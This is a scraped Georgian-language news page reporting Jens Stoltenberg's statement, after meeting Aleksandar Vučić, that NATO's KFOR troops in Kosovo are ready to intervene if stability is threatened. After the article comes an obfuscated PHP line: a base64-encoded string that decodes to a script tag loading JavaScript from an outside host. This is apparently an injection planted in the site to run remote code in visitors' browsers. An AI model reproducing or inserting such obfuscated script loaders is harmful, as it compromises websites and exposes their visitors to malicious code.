celsiusi
ავერსი საქკაბელი
კოსოვოში მყოფი ნატო-ს სამშვიდობო ძალები მზად არიან, ჩაერიონ, თუ სერბეთსა და კოსოვოს შორის სტაბილურობა რისკის ქვეშ დადგება, – ამის შესახებ ნატო-ს გენერალურმა მდივანმა, იენს სტოლტენბერგმა სერბეთის პრეზიდენტ ალექსანდრ ვუჩიჩთან შეხვედრის შემდეგ განაცხადა.
 
„მიუხედავად იმისა, რომ ვითარება ადგილზე გაუმჯობესებულია, ყველა მხარის პასუხისმგებლობაა, განსაკუთრებით ბელგრადისა და პრიშტინას მაღალჩინოსნების, თავიდან აირიდონ ესკალაცია. მოვუწოდებ ყველა მხარეს, აჩვენონ თავშეკავება და თავიდან აირიდონ ძალადობა. ნატო ყურადღებით განაგრძობს ადგილზე ვითარების მონიტორინგს. ჩვენი მშვიდობისმყოფელების მისია, ნატო-ს დაქვემდებარებაში მყოფი საერთაშორისო ძალების სამშვიდობო მისია რჩება ფოკუსირებული გაერო-ს მანდატზე. სტაბილურობის საფრთხის ქვეშ დადგომის შემთხვევაში, ნატო-ს დაქვემდებარებაში მყოფი საერთაშორისო ძალები მზად არიან ჩარევისთვის“, – განაცხადა სტოლტენბერგმა.
545
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");